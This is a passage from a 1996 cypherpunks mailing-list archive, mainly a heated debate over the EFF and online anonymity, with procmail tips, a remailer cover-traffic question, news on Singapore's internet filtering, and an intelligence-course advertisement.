ran under a man's pants and through his sock. "He always photographed very attractive women in their 20s with short skirts," added Det. Const. Mike Dicosola. He said the man was detected by two couples who noticed him moving his foot under the skirt of a woman. They followed the man, held him and called police. Police ask women who feel they've been victimized to call 808-5289. George Walter Campbell, 62, of Cornwall, has been charged with sexual assault and mischief. He returns to College Park court on Sept. 10. He was released on $750 cash bail yesterday. -30- From janzen at idacom.hp.com Wed Sep 4 16:47:56 1996 From: janzen at idacom.hp.com (Martin Janzen) Date: Thu, 5 Sep 1996 07:47:56 +0800 Subject: How to use procmail In-Reply-To: <199609042119.QAA06971@homeport.org> Message-ID: <9609042045.AA27973@sabel.idacom.hp.com> Adam Shostack writes: > Rule introductions of the form :# are depreciated. You should always > use :0, which means any line starting with * is a rule. > [...] > And :0: means use a lockfile on the folder. > [...] > :0 > *^Subject:.*unsub > /dev/null > :0: > *^TOcypherpunks > cypherpunks Thanks, Adam. I created my .procmailrc a long time ago, using the old 2.?? version, and now just cut and paste as required. New procmail users, listen to Adam! (And read the man page, even though it's a bit intimidating at first.) MJ From aba at dcs.ex.ac.uk Wed Sep 4 16:51:03 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Thu, 5 Sep 1996 07:51:03 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031904.MAA23619@eff.org> Message-ID: <199609042000.VAA00708@server.test.net> Stanton McCandlish writes on cpunks: > [again, since I'm not on the CP list these days, feel free to bounce this > over to the list if it doesn't make it. I'm not sure what the > non-subscriber posting policy is and/or whether such attempted posts are > filtered out, though I seem to recall they didn't used to be.] Cypherpunks always has been and remains an open list. You shouldn't need to wonder given cypherpunk views on free speech :-) > Black Unicorn writes: > > enough with its own policy to prevent its staff and board from making > > embarassing big brother type proposals to curtail the ability of any of us > > to post without attributation would be an alternative. I think an > > In other words you propose an alternate EFF that censors its own > boardmembers. No. But I too am rather suprised to hear an EFF board member apparently speaking against free speech. OK, so maybe she was mis-quoted so I wait for her rebuttal, but nope, she basically to my reading reiterates nothing but negative opinions on free speech and anonymity. Tim's quotes of her CFP speech further demonstrates her leanings. > I'm not aware of any logical consistency that could adhere to an > organization that simultaneously says it supports free speech, yet > demands that its board of directors never speak except in agreement with > the organization's policy. You are asking for a mini-dictatorship. EFF > has no position on anonymity. We also have no position on abortion or on > whether roast duck is better than fried chicken. You are in essence > demanding that EFF impeach any boardmember that offers an opinion in > public or in private about whether or not chicken is good stuff, or states > a belief about right to choose v. right to life positions. > > I'm sorry that we are not totalitarian enough for you. Lets put it this way: if Louis Freeh offered to be an EFF board member, would you take him on board? If he seemed quite pro-anonymity, and free speech, and later turned out to be having doubts, would you keep him? Ie if her views are proving a liability for EFFs reputation, perhaps you all ought to get together and see if you can work something out? Anonymity is a pretty darn major issue here, so it'd be really sad to see EFF coming down on the wrong side. I've seen some of the other EFF insiders own opinions, and would like to see them adopted in place of Dyson's views, which whether they are her opinion or not, are more likely to get misrepresented by the press as such, in face of a lack of an EFF position. EPICs statement looked a reasonable start. > Incidentally, Dyson made no such proposal as you refer to, but simply > expressed questions and doubts about the misuse of anonymity, and made a > clear and correct statement of fact ("you need to be able to get at > somebody's identity to enforce accountability") without offering any > value judgement about whether that was a good idea. She sounded pretty anti-anonymity to me. Are there a shortage of political and net-aware libertarians for board candidates or something? > She concluded that "the question is how do you also enforce freedom > of speech and freedom from prosecution for unpopular opinions," > clearly indicating at least as much doubt about the value of any > attempt to force identifiability and accountability. Even Dyson's > lead statement that "the damage that can be done by anonymity is far > bigger" online that offline is factually correct, and does not > consist of any kind of value judgement. It's simply an honest and, > IMNERHO, necessary observation. Perhaps the quote was unfortunate, perhaps she has also said pro-anonymity things. But a person who is pro-anonymity would surely try to emphasise the pro arguments also? The material I have seen so far does not seem to indicate that this is the case. If this is the case she needs to be _much_ more careful about what she says in `personal' interviews. > If we lie to the public, or lie to ourselves, we lose, because the > opposition will have arguements we have not even looked at much less > wrestled with. > > I'm sorry we are not self-delusional and dishonest enough for you. Be sure to express the pro-anonymity arguments while you're zealously hammering out every last thing that can go wrong with anonymity: like that free speech is not possible with out it. It's pretty much all or nothing, either you think free speech is worth the risk, or you prefer big brother, government access to keys, the works. [see http://www.c2.org/~winsock/ for a windows remailer] Adam -- #!/bin/perl -sp0777i In Tim's Cyphernomicon, he says - I have heard (no cites) that "going masked for the purpose of going masked" is illegal in many jurisdictions. Hard to believe, as many other disguises are just as effective and are presumably not outlawed (wigs, mustaches, makeup, etc.). I assume the law has to do with people wearning ski masks and such in "inappropriate" places. Bad law, if real. A lot of the motivation was to stop the Ku Klux Klan terrorism. On the other hand, the reason it was mentioned on the list a couple years ago was that a woman was arrested in some North Central city, probably Detroit, for violating it, because she was wearing a Middle-Eastern-style chador outfit that covered her face. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From mix at squirrel.owl.de Wed Sep 4 17:13:35 1996 From: mix at squirrel.owl.de (Squirrel Remailer) Date: Thu, 5 Sep 1996 08:13:35 +0800 Subject: No Subject Message-ID: <19960904203437.2587.qmail@squirrel.owl.de> -----BEGIN PGP SIGNED MESSAGE----- Subject: How to send bogus mail to mislead traffic analysis? Hi How can I send messages to remailer so that they will get lost? I want to generate a more or less steady flow of remailer-processed, encrypted mail. Can I send to nobody at some_remailer.net? What are the guidelines for that? What are the best remailers to send to? Cheers Bugged - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2i mQCNAjItXH4AAAEEAL7znlceWxOboMgS5TJykI0LvxZ+nRwaUle05LyGdbQK8Tbv cnFb945OgUMxlWb+xpwYKpZIaZRJME86aO5OvMAI8IN5AQv1zx/e1v+l/6G8QyWN kRqtIxA++WlPO0co9DbckmED7IhtMabIto9S5vH7m6UzH/ASLE/d3JIQvo5FAAUR tAZCdWdnZWSJAJUCBRAyLVzhT93ckhC+jkUBAYnsA/9WGCWZvZXRibOs6Be9roWX fgTGhDl0rZhH13D5n7O77uQfAMCYf9ALbfn9UkbnMnAGtDyecPTp9TC3Ha65TkWv ald2LoLvMD01d6iS8SkvedcgHqojfh/Q55NkJ0wtO/Ne0jOtFVQzDEtF7awwypAx HZgIoEMsSLDrTT0EwTlTjg== =mlIT - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAgUBMi1g10/d3JIQvo5FAQE70wQAsVZzVT9MrP5TuKcilJaehufve5O56B4y 0y5vaeax5fAAElZz9SxRV+meAgUNvRNTUu1afZIHYzoFUdJWoSAroLxMjSqbv1uT O95Qur+jJRLwgDoo+Kgse8DESDqlGdI2kab6KxDrSz2erkARYn9A5/JQTTI/L3I5 z1eW2fBec9c= =kDXU -----END PGP SIGNATURE----- From unicorn at schloss.li Wed Sep 4 17:17:03 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 08:17:03 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609031730.KAA20063@netcom2.netcom.com> Message-ID: [This will be my last comment on this thread.] On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote: > > >I would put forth that you know nothing of my efforts, and therefore are > >in no position to judge me. I would also put forth that the efforts of > >EFF, or lack thereof, are quite public. > > that's my point. an entity that is willing to put its > reputation on the line is inherently more valuable than one that > is not, imho. all the EFF members have good public track records. > what EFF has accomplished is checkered, like any battle-scarred > infrantry will experience. if you expect unadulterated success, > you're not living in the same reality everyone else around here > is. If you're going to ask me for money and support, you damn well better produce unadulterated success. > granted, EFF has made some serious compromises in their agenda. > they're finding their identity. but it doesn't help to have people > rant at them and ignore their notable successes, and tend to criticize > them merely because they're a public target. Awww, poor EFF. It just needs a little love and attention. It's trying to be the best compromising entity it can be. It's not fair to criticize it. We don't want to frighten it or anything, it might be stunted for life. > whenever you criticize something, please keep in mind the basic > qualification: what is a better alternative? Sometimes nothing at all can be a better alternative. > sure, EFF hasn't had > stellar success, but then, who has in the agenda they are pursuing? > their goals are extremely ambitious and difficult in the current > climate. lack of success is proof of the difficulty, not of any Again, I'm sure every violin in the place is playing for EFF and it the powerful traumas it has to endure. What do you think this is? The olympics? I don't CARE how hard the job is. You don't get things done by being sympathetic in politics. Maybe, Lance, that's how it works in Colorado, but not in D.C. Take the hearts and flowers crap elsewhere. IF they are asking for money I don't think that excuses are a luxury they can indulge in. > when you begin to understand this, you > won't alienate those you are critical of. EFF members are *tremendously* > open to positive comments. instead you harangue them and lose their > good will to the point that they may tend to ignore cpunk comments > entirely because of your very poor example. If EFF is so sensitive that my comments will cause them to close their ears to their potentially most interested constituancy, well, EFF is an organization that needs to die and be replaced. > >I think any organization that would apply political pressure rather than > >bow to it would be an alternative. I think an organization in touch > >enough with its own policy to prevent its staff and board from making > >embarassing big brother type proposals to curtail the ability of any of us > >to post without attributation would be an alternative. I think an > >organization without the internal conflict and strife that has clearly > >marred EFF in past and made it a laughable attempt at cohesive political > >persuasion would be an alternative. I think an organization that had > >official policies on the core issues which it proposes to influence would > >be an alternative. > > why don't you start one then? As I said before, you know nothing of what I am doing. I don't buy the "well then you do it" crap. They are taking other people's money. Do it right because that is their JOB. I don't have time to play about with net politics in D.C. right now. Nor, frankly, do I think my resources in that area would do much good. Maybe EFF can't do the job, which is the position you seem to be taking, then maybe no one can and resources should be allocated elsewhere. Just don't come whining to me about how life is so hard on EFF. Deal. what you seem to fail to adequately > understand is that there is virtually no organization in the world > that is free from the difficulties you describe. whenever you have > multiple people working together, you aren't going to have clear-cut > successes. cpunks are always yelling at anything resembling organization, > which really annoys me. EFF has had tremendous powerful successes in > areas you are conveniently overlooking, in areas that are hard > to measure, such as increasing public awareness. can you make a good > case that EFF has had no positive effect? we may be living in a much > darker reality without them. Yadda Yadda Yadda and life is so hard isn't it a shame? > >In short, an organization that had even one of the needed elements of > >legislative influence. (Cohesive, directed, persistent, and > >uncompromising). > > our congress does not have this property after centuries of trying. You confuse legislation with legislative influence. Advocacy with concensus building. > > What is so shocking about announcing that a > >given organization does not support my interests and therefore calling on > >others who share my interests not to make financial donations to said > >organization? > > you can criticize an organization without implying the people who contribute > to it are incompetent, a distinction that has subtly eluded you so far. I can, but I happen to believe that they are. Look at the slips. A political action organization cannot afford to have their primary members spouting off like that. It kills the organization. It has, in my view. Perhaps EFF has an important function. Lobbying is not it. > > Is there something EFF fears in free speech and political > >consensus building? Perhaps if they had a straightforward policy.... > > no matter what they decide, they will be flamed by someone such as > yourself. they do have an agenda. What's their anonymous poster agenda then? > >Phrased another way, who cares what you are tired of hearing? > > the EFF ranting is periodic, and your own sour comments are > a repeated feature of this list. who *are* you? why are you so > critical of everything in existence? based on previous rants, > you're a habitual sourpuss. When people are asking for money and promising results, I expect results. If this makes me a sourpuss, fine, I'm a sourpuss. As for who I am, it is and shall be none of your business. I understand that there is a dtendency here to get flaky and passive. "So what, they are trying." Hey, life is hard. Sometimes people aren't up to the task. Fine, admit it rather than dragging it on for years and move on. If EFF ranting is periodic perhaps EFF should take a hint? > >No, but when an organization espouses nothing on a given subject key to > >its mission, what does that say? What about when its members espouse > >entirely different and even counter productive beliefs > > again, you are presuming that anonymity is key to their mission. > that's a big leap of faith. there is room for honest disagreement. > you haven't heard of their agenda personally, so you are assuming > there is none. from what I have seen, there is a reasonably > cohesive agenda going on, and I'm not, like yourself, assuming > that it doesn't exist merely because I haven't seen it blared in > a noisy advertisement somewhere. > > I agree with some of the EFF member's comments: anonymity could > be a very serious quagmire to support. there are probably better > trees to bark up. Anonymity is currently the status quo. Tell me, what exactly, if someone takes the position that it is too hard to support, are they going to do to, for example, prevent what I'm doing? Will you be required to register with your ISP? Provide credit references to be permitted on the net? Use a smart card with fingerprint checking to log on? Anonymity is the key. Period. Your failure to see this simply destroys your argument. Look Lance, just because you have not been able to keep from being outted doesn't mean that some others don't benefit from Anonymity. > EFF has lobbied against many of the bills you mention. again, I think > you're being unfair in assuming merely because you haven't heard > of them accomplishing anything, they haven't. If I haven't heard of EFF's accomplishments then they aren't doing their job. > >I do infact feel the cpunks have a greater track record than EFF. Tell > >me, what has EFF done? The list of "cypherpunk" accomplishments in terms > >of making the net a better place to be is, in my view, significant. > >Certainly the discussion here is livelier than anything I've seen from > >EFF. > > ah, the fundamental illusion that is going on here. discussion alone > is WORTHLESS in changing the world. yet we have REAMS of it on the > cpunk list. I'd say EFF has *acted* and put enormous effort into > its agenda. So trying hard is the measure of success? "But he was trying SO hard to get the gold medal, let's just give it to him." Bah. > but it is invisible because its not easily quantified. > ask them how many pamphlets they have printed for the public, how > much mail they have sent out to members informing them of > developments, etc. consider the high-quality EFF newsletter. Wait, wait. Wasn't it you who just said "ah, the fundamental illusion that is going on here. discussion alone is WORTHLESS in changing the world." How are pamphlets any different? > is there anything like that in the cpunk area? frankly I think your > comparing cpunks to EFF is really laughable. I take that almost as a compliment. > they are not even in the same ballpark. Oh, I agree. > >Well what, EFF, have you done for us LATELY? > > EFF hasn't done much for anyone who hasn't paid their dues.. So keep paying Lance. At least you're getting some satisfaction out of it. > > >English is not my first language. Start paying my hourly rate to type in > >the thousands of words and dozens of legal summaries I send to this list > >every month and I will begin to proof read carefully. > > your legal summaries are impressive. your rabid criticisms leave > a sour taste in my mouth. measured criticism, I can deal with. If it's too hot... > >> and you, like many other cypherpunks and cyberspace weasels, > >> have a whine-and-shriek-from-the-shadows bent. > > > >And your point is? > > > >You'd like the shadows lifted? Speaking without a true name attached is > >somehow evil? > > really, an opinion without attribution is not worth as much as > one with it. there's no escaping this simple concept. I agree that > a pseudonym can gain a reputation, but yours has very little > associated with it to qualify criticism of EFF imho. so you have > posted regularly to the cpunk list. big deal. By your logic you're not in much of a position to commend EFF or criticise me for that matter then, "Vlad." > >This is EFF talking. "The situation is hopeless, bail now to preserve > >image." > > EFF has changed its direction from working in washington. Exactly. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From jya at pipeline.com Wed Sep 4 17:20:58 1996 From: jya at pipeline.com (John Young) Date: Thu, 5 Sep 1996 08:20:58 +0800 Subject: SG Spy Ring Message-ID: <199609042056.UAA18784@pipe6.t2.usa.pipeline.com> Financial Times, September 4, 1996, p. 4. Singapore looks to superhighway By James Kynge in Kuala Lumpur Singapore took another step toward its vision of becoming an "intelligent island" yesterday, announcing an initiative to link the city-state's main on-line networks. Mr Goh Chee Wee, Singapore's minister of state for communications, said the "internetwork hub" would link service providers of the Internet, government on-line networks, commercial networks and some others. Singapore's move follows an ambitious scheme announced by neighbour Malaysia last month to launch an "information superhighway" designed to attract the world's leading information technology companies to Kuala Lumpur. The perceived advantage in Singapore's initiative is that users will be able to access all networks using a single leased line, rather than the separate lines currently necessary. The hub will use a single set of national standards, meaning inter-operability between networks becomes easier. Mr Goh said the hub should be up and running by the end of the year. A mechanism to identify users electronically would be incorporated into the hub network next year, paving the way for secure operations such as payments, banking and confidential correspondence. The move is part of the Information Technology 2000 masterplan, a scheme which aims to accomplish the sometimes conflicting aims of exploiting the information superhighway to its full potential while continuing to insulate Singaporeans from undesired influences. From September 15, the city-state will implement its first big attempt to police cyberspace. From then all Internet providers must channel more than 120,000 subscribers on the island through "proxy servers" before they reach the net. These servers will check every Internet site a subscriber requests and block access to a about a dozen banned sites known to display pornography. The government has warned against material deemed politically subversive or inciting religious disharmony. [End] From azur at netcom.com Wed Sep 4 17:34:30 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 5 Sep 1996 08:34:30 +0800 Subject: What is the EFF doing exactly? Message-ID: >Vladimir Z. Nuri wrote: >so in a very real sense, anonymity in >the phone system was considered a "problem" by some that has been >"solved" or "modified" by some recent advancements. (yes, most people >agree caller ID is an advancement). Yes, and that is why some companies (e.g., Private Lines) offer anonymous out-bound calling services. > >I think cpunks should hold the view that communication is a matter >of mutual consent between sender and receiver. if a receiver says, >"I don't want any anonymous messages", then should be able to block them. >this is essentially what is happening with the remailers *right*now*, >if you ask any remailer operator. people ask not to receive anonymous >mail, and are put on the blocking lists. imho only the extremists are arguing, >and have always argued, that they should have some ability to put >an anonymous message in front of someone else against their will. > >this basic rule becomes more murky when you look at public forums, >because you can't really say whether given individuals reading them want to >hear something anonymous or not. by designing the forum beforehand >to force the situation, you solve this problem. > I find most unwanted communications objectionable, anonymous or not. How about billboards. Should the fact that I choose to be outside or on a roadway make my eye a target for ads? (If so, then why not consider having an e-mail account in a similar vein?) The fact that I can immediately, or later, identify the responsible party doesn't keep me from initially seeing the ad and taking my time. If I object, what are my alternatives? The last thing I want is monetary compensation. I want my time back. Failing this, I want the abusers time (sorta' like in Zardoz). >I do believe that in the future there will be all types of forums: those in >which identity is required, those in which it is optional, and those in >which it is always cloaked. this is eminently reasonable imho. >those who argue against one of the >above's existence (such as saying it involves a ghettoization >of anonymity, that there should always be an ability to be anonymous >in any communication setting) are extremists imho. "The reasonable man adapts himself to the world: the unreasonable one persists in trying to adapt the world to himself. Therefore all progress depends on the unreasonable man." --George Bernard Shaw PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From azur at netcom.com Wed Sep 4 17:52:52 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 5 Sep 1996 08:52:52 +0800 Subject: flimflamery on anonymity Message-ID: >Vladimir Z. Nuri wrote: >(last line is sarcasm for the sarcasm impaired) >a cpunk position I have seen repeated often. it goes along a very >simplistic line of reasoning that I have seen TCM evoke repeatedly. >it rather annoys me. it goes like this: > >cyberspace is merely discussion between people. anonymity should >be allowed anywhere there are discussions (its a free speech issue). >therefore it should be possible everywhere in cyberspace. > >this idea lacks a lot of subtlety in thought and to my mind is >tremendously simplistic. [snip] > >cpunks will also argue that anonymity can suffice for any >business transaction. that may be so, but what about a business >that simply says, "we choose to require identity among our >customers, and you can go elsewhere if you disagree". These attitudes create business opportunities for others who would seek to serve those who prefer anonymity. [snip] > >cyberspace as a whole is *not* going to lead to a totlal motion >away from physical identity. in some ways physical identity will >be more strictly enforced in cyberspace, in "some regions". >there will be other regions of cyberspace in which "anything goes". > As long as attractive, anonymous, alternatives sufficient for those (of a 'cyherpunk' mind) seeking to communicate, transact commerce, etc. exist it won't matter to whether others choose to enforce stricter identity adherence. [snip] >of course in the cpunk mailing list, who cares if there are >anonymous/pseudonymous participants? [snip]... but far more is at stake >in the "real world" and the risks posed by anonymity will be >adequately diluted because of this. and it won't be by people >who are all "f***ing statists"-- it will be by reasonable people >such as those who head EFF, who are interested in a civilized >society. > As always the market and the street will decide. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From dfloyd at io.com Wed Sep 4 17:55:30 1996 From: dfloyd at io.com (Douglas R. Floyd) Date: Thu, 5 Sep 1996 08:55:30 +0800 Subject: Letter to the Observer [re: Internet paedophile] In-Reply-To: <9609041639.AA25461@cti02.citenet.net> Message-ID: <199609042131.QAA02995@xanadu.io.com> > > On 4 Sep 96 at 5:41, Martin Minow wrote: > > > Forwarded to me by a friend: > > > The following letters were delivered to the Editor of the Observer > > last week as a request to publish a retraction of their article > > relating to the Internet that appeared on Sunday 25th. August. > > One way to limit or retaliate against diffamation would be to refuse > internet access to anybody known to be part of any such medias, being > tv or paper. > > ISPs would probably easily agree since the revenues coming from > journalists vs from the general population is probably minuscule. Of > course, the conventionnal media would set up their own ISP but they > could be identified. > > Does that makes sense or am I out to lunch? AOL will take them. Most of them are on there anyway. > > jfa > > Jean-Francois Avon > DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal > JFA Technologies, R&D consultants: physicists, technologists and engineers. > > PGP keys at: http://w3.citenet.net/users/jf_avon > ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 > > From declan at eff.org Wed Sep 4 18:10:36 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 5 Sep 1996 09:10:36 +0800 Subject: Letter to the Observer [re: Internet paedophile] In-Reply-To: <9609041639.AA25461@cti02.citenet.net> Message-ID: Jean-Francois, your comments are inspired! As a member of "such media" in that I still publish articles on dead trees -- I have articles in fall issues of Wired and Playboy, for instance -- I rejoice in your reasoned suggestion that you deny me and my ilk access to the Net. But wait! I connect through wired.com, eff.org, or *.edu accounts. How do you plan to kick me off my "ISPs?" No, you're not out to lunch. -Declan On Wed, 4 Sep 1996, Jean-Francois Avon wrote: > > One way to limit or retaliate against diffamation would be to refuse > internet access to anybody known to be part of any such medias, being > tv or paper. > > ISPs would probably easily agree since the revenues coming from > journalists vs from the general population is probably minuscule. Of > course, the conventionnal media would set up their own ISP but they > could be identified. > > Does that makes sense or am I out to lunch? > // declan at eff.org // I do not represent the EFF // declan at well.com // From jonl at well.com Wed Sep 4 18:31:41 1996 From: jonl at well.com (Jon Lebkowsky) Date: Thu, 5 Sep 1996 09:31:41 +0800 Subject: What is the EFF doing exactly? Message-ID: <2.2.16.19960904170224.40bfe688@mail.well.com> At 08:02 PM 9/3/96 -0700, James A. Donald wrote: >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote: >>>> Not necessarily. The character of the anonymous speech is decisive. If you >>>> use anonymity to cloak harassment, for instance, the anonymity (which >>>> removes accountability) is a problem. The accountability issue is real and >>>> should be addressed, not evaded. > >At 07:44 AM 9/3/96 -0700, James A. Donald wrote: >>>No: The harassment is the problem, not the anonymity that makes it >>>possible. > >At 06:52 AM 9/4/96 -0500, Jon Lebkowsky wrote: >>The harassment is one problem, the lack of accountability another. > >So: > >Lucky Green and Dark Unicorn are not accountable. This is a problem? > >Because it is a problem "We" need to do something about it, Looks like you didn't quite finish yer msg...what is it that "We" need to do about it? -- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com From azur at netcom.com Wed Sep 4 18:51:08 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 5 Sep 1996 09:51:08 +0800 Subject: Intelligence Community Briefing Message-ID: My security clearence has long since expired. Anyone on the list plan to attend and report back :-) ------------------------------------ AFCEA The U.S. Intelligence Community: Who Does What, With What, For What? October 8, 9, 10, 1996 #### This course is Classified SECRET. ### Sponsored by The Community Management Staff. Location: AFCEA International Headquarters, Fairfax, Virginia The U.S. Intelligence Community continues to undergo substantial changes. This top-down course provides an up-to-date understanding of the structure and functions of the Intelligence Community and its components, the changing threats and challenges with which they must deal, as well as resources and processes used. The course addresses intelligence programs structure and provides insight into relations between intelligence producers and policy consumers, as well as useful information about the interaction between U.S. Intelligence and industry. WHO SHOULD ATTEND This course is suitable for industry managers, designers and producers of security and intelligence systems and products, including software and special purpose products. The up-to-date coverage of the changing intelligence community is equally suitable for intelligence officers and operatives proficient in their own services or specialties who have or expect to have responsibilities involving other agencies and services, overview functions or supervision of interfaces between various agency efforts. Past attendance has been divided about equally between persons from the government and from industry. COURSE OUTLINE: Intelligence, Practice and Issues Background of U.S. Intelligence Definitions of Intelligence Intelligence Process Relationships between Intelligence and Policy Systems Intelligence Issues Components and Coordination of the Intelligence Community Organization and Components of the U.S. Intelligence Community The Role of the DCI DCI Special Staffs and Multi-Agency Activity Centers The Community Management Executive Director and Staff The National Intelligence Council Intelligence Oversight and Management within the Executive Branch Civilian Intelligence Organizations Military Intelligence Components Coordination of Counterintelligence Intelligence Budget Structure NFIP TIARA JMIP The Central Intelligence Agency Structure and Functions of the Changing CIA Intelligence Collection, Analysis and Dissemination CIA Support to Military Intelligence Operations Military Intelligence OASDC3I Organization and Functions Structure and Functions of the Defense Intelligence Agency Support for OSD, JCS, and Operational Commands Military Services: Organization, Roles and Missions Impact and Trends Resulting from Changing World Situation and Operational Experiences Overhead Reconnaissance and Surveillance National Reconnaissance Office Defense Airborne Reconnaissance The National Security Agency and Central Security Service Role in the Community Specific Functions Services of Common Concern Federal Bureau of Investigation FBI Organization and Functions Law Enforcement Intelligence Functions Counter-Intelligence Relationships with CIA and Other Components of the Intelligence Community Counternarcotics Intelligence and the Drug Enforcement Administration The Problem The Counternarcotics Community DCI Counternarcotics Center Operational Counternarcotics Intelligence Activities Imagery The Central Imagery Office Relationships with Other Parts of the Intelligence Community Support to Operational Commands Intelligence Support for Arms Control and Disarmament Arms Control Intelligence Staff Non-Proliferation Center On-Site Inspections Nuclear Intelligence and Role of Department of Energy Intelligence Community and the Congress Functions of the Oversight Committees Legislation Affecting the Intelligence Community Trends Intelligence and Industry Relationship Between Intelligence Components and the Private Sector Opportunities to Market Services and Products Control Mechanisms Business Strategies Intelligence Developments in Private Industry Internal Intelligence System Risk Analysis Course Coordinator COL John D. Sitterson, USA (Ret.), is now a consultant to AFCEA and industry. His military career included assignments in intelligence and international security affairs, as well as combat and commands with extensive C3I involvement. He headed the Department of National and International Security Studies at the Army War College. Colonel Sitterson served on a White House Task Force, in operations coordinating elements under NSA, on a Presidential-Congressional Commission, and as a military member of two blue ribbon study groups at the Council on Foreign Relations. As a civilian he served 20 years in defense-related government and industry positions, including 11 years with HRB-Singer (now HRB Systems). Lecturers: Mr. Peter C. Oleson has had extensive experience in intelligence related positions in the U.S. government and industry, including the Office of the Secretary of Defense. He has been adjunct professor of Resource Management at the Defense Intelligence College. He now heads his own consulting firm. Other lecturers will be authoritative representatives of the Central Intelligence Agency; Community Management Staff; the Office of the Assistant Secretary of Defense (C3I); Defense Intelligence Agency; National Security Agency; Intelligence Services of the Army, Navy, Air Force and Marine Corps; the National Reconnaissance Office; the Defense Airborne Reconnaissance Office; the Central Imagery Office; Department of State (INR); Department of Energy; Federal Bureau of Investigation; Drug Enforcement Administration; Arms Control Intelligence Staff; Non-Proliferation Center and the House of Representatives Permanent Select Committee on Intelligence. Register by submitting the following information to: AFCEA 4400 Fair Lakes Court Fairfax, Virginia 22033-3899 Phone: (703) 631-6135 FAX (703) 631 4693 email = aafceapdc at aol.com until 1 October and then pdc at afcea.org Course Name or Number: Intelligence Course/ 203N Date Course Convenes: 8 October 1996 STUDENT: Rank/Honorific: Service: First Name: MI: Last Name: Title/Position: Company/Organization: Division: Mail Stop/ Suite/ Office Symbol: Street Address: City: State: ZIP: Country Telephone: (area code) Fax: (area code) Please indicate method of payment intended: Mastercard/Visa/AMEX/Diners Club/ DD1556/Voucher All registrations will be acknowledged. The acknowledgement letter will contain information on location of the course, housing and transportation details. Fees: Government Personnel $700 Industry $950 ### A Classified Visit Request must be submitted by mail or fax before the student is permitted to attend the course. This request should be received at AFCEA at least the week before the class convenes. ------------------------- PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From azur at netcom.com Wed Sep 4 18:57:10 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 5 Sep 1996 09:57:10 +0800 Subject: Reputations Message-ID: "Regulation - which is based on force and fear - undermines the moral base of business dealings. It becomes cheaper to bribe a building inspector than to meet his standards of construction. A fly-by-night securities operator can quickly meet all the S.E.C. requirements, gain the inference of respectability, and proceed to fleece the public. In an unregulated economy, the operator would have had to spend a number of years in reputable dealings before he could earn a position of trust sufficient to induce a number of investors to place funds with him. Protection of the consumer by regulation is thus illusory." -- Alan Greenspan TCM, seems like a reputable source to support your views. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From jimbell at pacifier.com Wed Sep 4 19:03:26 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 5 Sep 1996 10:03:26 +0800 Subject: Race Bit: C Message-ID: <199609042222.PAA19090@mail.pacifier.com> At 02:47 AM 9/4/96 -0700, Timothy C. May wrote: >At 3:02 AM 9/4/96, James A. Donald wrote: >>At 10:33 PM 9/3/96 -0800, jim bell wrote: >>>>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>>>use of encryption to thwart a law-enforcement investigation illegal." I >>>>immediately pointed out that while this wouldn't make _encrypted_ remailers >>>>illegal, per se, effectively it would because the moment an investigation >>>>(even a phony or trumped-up one) is started and is "thwarted" by the >>>>encryption used, the remailer operator became guilty of a crime. >... >>I believe that judges have a policy of interpreting deliberately >>ambiguous statutes in whatever way makes the most sense. The only >>sensible interpretation of Leahy's bill is that it criminalizes >>strong remailers, that it is intended to punish ANYONE, not just >>the criminals themselves, who obstructs investigations. > >As the recent discussion of knives, switchblades, and throwing stars >showed, such ambiguous laws are often used to keep the coloreds down. Perhaps the most ominous part of making "use of encryption to thwart an investigation" illegal is _not_ that remailer operators might be prosecuted, but that they might NOT be prosecuted in a deal where (in exchange for not being prosecuted) they continue to operate the remailer, "cracked" or sabotaged so that they share all the info with the cops. While even that won't make chained remailers totally useless, eventually suspicions of such a crack will surface, which will help sabotage the credibility of all remailers, not just the ones that have been "stung." Jim Bell jimbell at pacifier.com From adam at homeport.org Wed Sep 4 19:40:05 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 5 Sep 1996 10:40:05 +0800 Subject: How to use procmail In-Reply-To: 